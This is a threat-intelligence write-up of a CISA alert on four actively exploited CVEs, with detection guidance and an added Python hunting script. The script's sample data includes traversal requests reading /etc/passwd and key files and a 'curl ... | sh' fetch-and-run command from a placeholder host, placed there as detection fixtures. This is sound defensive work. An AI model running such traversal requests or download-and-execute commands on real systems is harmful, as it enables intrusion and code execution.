
CISA Adds Four Known Exploited Vulnerabilities to Catalog

CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog with four new actively exploited vulnerabilities affecting Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X devices. Organizations are strongly urged to prioritize patching these flaws, which include path traversal, missing authorization, and command injection vectors, to reduce their exposure to cyberattacks.

Sensitivity: Immediate | Confidence: high | Analyzed: 2026-04-24 | Category: reports

Authors: CISA

Source: CISA

Key Takeaways

  • CISA has added four new vulnerabilities to the Known Exploited Vulnerabilities (KEV) Catalog due to active exploitation in the wild.
  • Affected products include Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X.
  • The vulnerabilities involve Path Traversal, Missing Authorization, and Command Injection.
  • Federal Civilian Executive Branch (FCEB) agencies are mandated to remediate these vulnerabilities under BOD 22-01.

Affected Systems

  • Samsung MagicINFO 9 Server
  • SimpleHelp
  • D-Link DIR-823X

Vulnerabilities (CVEs)

  • CVE-2024-7399
  • CVE-2024-57726
  • CVE-2024-57728
  • CVE-2025-29635

Attack Chain

Malicious actors are actively exploiting public-facing applications using path traversal, missing authorization, and command injection vulnerabilities in Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X devices. Successful exploitation allows attackers to bypass authentication, access unauthorized files, or execute arbitrary commands on the target systems. Specific attack chains vary per vulnerability, but all are confirmed to be actively leveraged in the wild for initial access or privilege escalation.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

No specific detection rules or queries are provided in the CISA alert.

Detection Engineering Assessment

  • EDR Visibility: Low. Network appliances such as D-Link routers cannot run EDR agents. Samsung MagicINFO and SimpleHelp servers may carry EDR, but the initial web-based exploitation blends with normal HTTP traffic until post-exploitation commands are executed.
  • Network Visibility: Medium. Network IDS/IPS and Web Application Firewalls (WAF) can detect path traversal sequences ('../' and URL-encoded variants such as '..%2f') or command injection payloads in inbound HTTP requests, provided the traffic is not TLS-terminated beyond the sensor.
  • Detection Difficulty: Moderate. Detecting exploitation requires either network signatures specific to these CVEs or behavioral monitoring of the affected applications spawning unexpected child processes.

Required Log Sources

  • Web Server Access Logs
  • Network IDS/IPS Logs
  • Application Audit Logs
  • Process Creation Logs (Event ID 4688 / Sysmon Event ID 1)

Hunting Hypotheses

  • Hypothesis: Look for suspicious child processes (e.g., cmd.exe, sh, bash) spawned by SimpleHelp or Samsung MagicINFO server processes, indicating potential command injection or post-exploitation activity.
    Telemetry: Process Creation Logs | ATT&CK Stage: Execution | FP Risk: Low
  • Hypothesis: Search web access logs for URI patterns containing directory traversal sequences (e.g., '../', '..%2f') targeting Samsung MagicINFO or SimpleHelp endpoints.
    Telemetry: Web Server Access Logs | ATT&CK Stage: Initial Access | FP Risk: Medium
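The following script turns both hunting hypotheses above into runnable checks. It is an added example and is not code from the CISA alert or from any of the affected vendors. The access log lines and process-creation events are constructed samples, the Common Log Format parser is a minimal one, and the server-process path markers (`SERVER_PARENT_MARKERS`) and shell names (`SHELLS`) are assumptions that must be tuned to the real install paths and platforms in your environment. The traversal check percent-decodes repeatedly, so double-encoded sequences such as `..%252f` are caught as well as the `../` and `..%2f` forms named in the table.

```python
"""Hunting checks for path traversal in access logs and shell children of
server processes. Added example; sample data is constructed, not real telemetry."""
import re
from urllib.parse import unquote

# Constructed Common Log Format lines (sample data, not real traffic).
ACCESS_LOG = """\
203.0.113.10 - - [24/Apr/2026:10:01:02 +0000] "GET /images/logo.png HTTP/1.1" 200 5120
203.0.113.44 - - [24/Apr/2026:10:02:11 +0000] "GET /static/../../etc/passwd HTTP/1.1" 200 1024
203.0.113.44 - - [24/Apr/2026:10:02:15 +0000] "POST /upload?name=..%2f..%2fconfig.xml HTTP/1.1" 200 88
203.0.113.45 - - [24/Apr/2026:10:03:01 +0000] "GET /download?file=..%252f..%252fkeys.db HTTP/1.1" 404 0
203.0.113.46 - - [24/Apr/2026:10:04:09 +0000] "GET /search?q=dots..fine HTTP/1.1" 200 300
"""

# Minimal CLF parser: client IP, timestamp, method, URI, status.
CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)
# ".." followed by a forward or back slash, evaluated after decoding.
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')


def normalize_uri(uri, rounds=3):
    """Percent-decode until stable (bounded) so ..%252f -> ..%2f -> ../ is seen."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def find_traversal(log_text):
    """Return one dict per access-log line whose decoded URI contains traversal."""
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue  # skip lines that are not CLF
        norm = normalize_uri(m['uri'])
        if TRAVERSAL_RE.search(norm):
            hits.append({
                'ip': m['ip'], 'ts': m['ts'], 'method': m['method'],
                'uri': m['uri'], 'decoded': norm, 'status': int(m['status']),
            })
    return hits


# Assumed path fragments identifying the SimpleHelp / MagicINFO server processes;
# replace with the actual install paths or executable names on your hosts.
SERVER_PARENT_MARKERS = ('simplehelp', 'magicinfo')
# Shells that a web or remote-support server process should not normally spawn.
SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'sh', 'bash', 'dash'}

# Constructed events shaped like Sysmon Event ID 1 / Windows 4688 fields.
# Paths are illustrative assumptions, not the vendors' real binary locations.
PROCESS_EVENTS = [
    {'ParentImage': r'C:\SimpleHelp\jre\bin\java.exe',
     'Image': r'C:\Windows\System32\cmd.exe', 'CommandLine': 'cmd.exe /c whoami'},
    {'ParentImage': '/opt/MagicInfo/tomcat/bin/java',
     'Image': '/bin/sh', 'CommandLine': 'sh -c "curl http://203.0.113.99/x | sh"'},
    {'ParentImage': r'C:\Windows\explorer.exe',
     'Image': r'C:\Windows\System32\cmd.exe', 'CommandLine': 'cmd.exe'},
    {'ParentImage': '/opt/MagicInfo/tomcat/bin/java',
     'Image': '/usr/bin/java', 'CommandLine': 'java -jar helper.jar'},
]


def _basename(path):
    return path.replace('\\', '/').rsplit('/', 1)[-1].lower()


def find_suspicious_children(events):
    """Return events where a monitored server process spawned a shell."""
    hits = []
    for ev in events:
        parent = ev['ParentImage'].lower()
        if any(mark in parent for mark in SERVER_PARENT_MARKERS) and _basename(ev['Image']) in SHELLS:
            hits.append(ev)
    return hits


if __name__ == '__main__':
    for h in find_traversal(ACCESS_LOG):
        print('traversal', h['ip'], h['method'], h['uri'], '->', h['decoded'], h['status'])
    for ev in find_suspicious_children(PROCESS_EVENTS):
        print('shell child', ev['ParentImage'], '->', ev['CommandLine'])
```

The traversal hit list carries the HTTP status so a 200 response to a traversal request can be triaged ahead of 404s from scanner noise; that is the main lever for the Medium false-positive risk noted in the table. The process-ancestry check is deliberately strict (shell basename only, no command-line heuristics), which is why its false-positive rate is low but it will miss a server process that launches a non-shell binary directly.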

Control Gaps

  • Lack of EDR support on IoT and router devices (D-Link)
  • Exposure of unpatched administrative interfaces to the public internet

Key Behavioral Indicators

  • Unexpected child processes originating from web service executables
  • Directory traversal strings in HTTP GET/POST requests

False Positive Assessment

  • Low for the process-ancestry hunt (server processes spawning shells); Medium for the web-log traversal search, which also matches routine vulnerability scanner traffic and should be triaged by response status and target host.

Recommendations

Immediate Mitigation

  • Apply vendor-supplied patches for Samsung MagicINFO 9 Server, SimpleHelp, and D-Link DIR-823X immediately.
  • Isolate vulnerable systems from the public internet if patching is not immediately possible.

Infrastructure Hardening

  • Implement Web Application Firewalls (WAF) to block path traversal and command injection attempts.
  • Restrict administrative interfaces to trusted IP ranges or internal networks only.

User Protection

  • N/A

Security Awareness

  • Ensure vulnerability management teams are subscribed to CISA KEV updates and prioritize patching accordingly.

MITRE ATT&CK Mapping

  • T1190 - Exploit Public-Facing Application
  • T1059.004 - Command and Scripting Interpreter: Unix Shell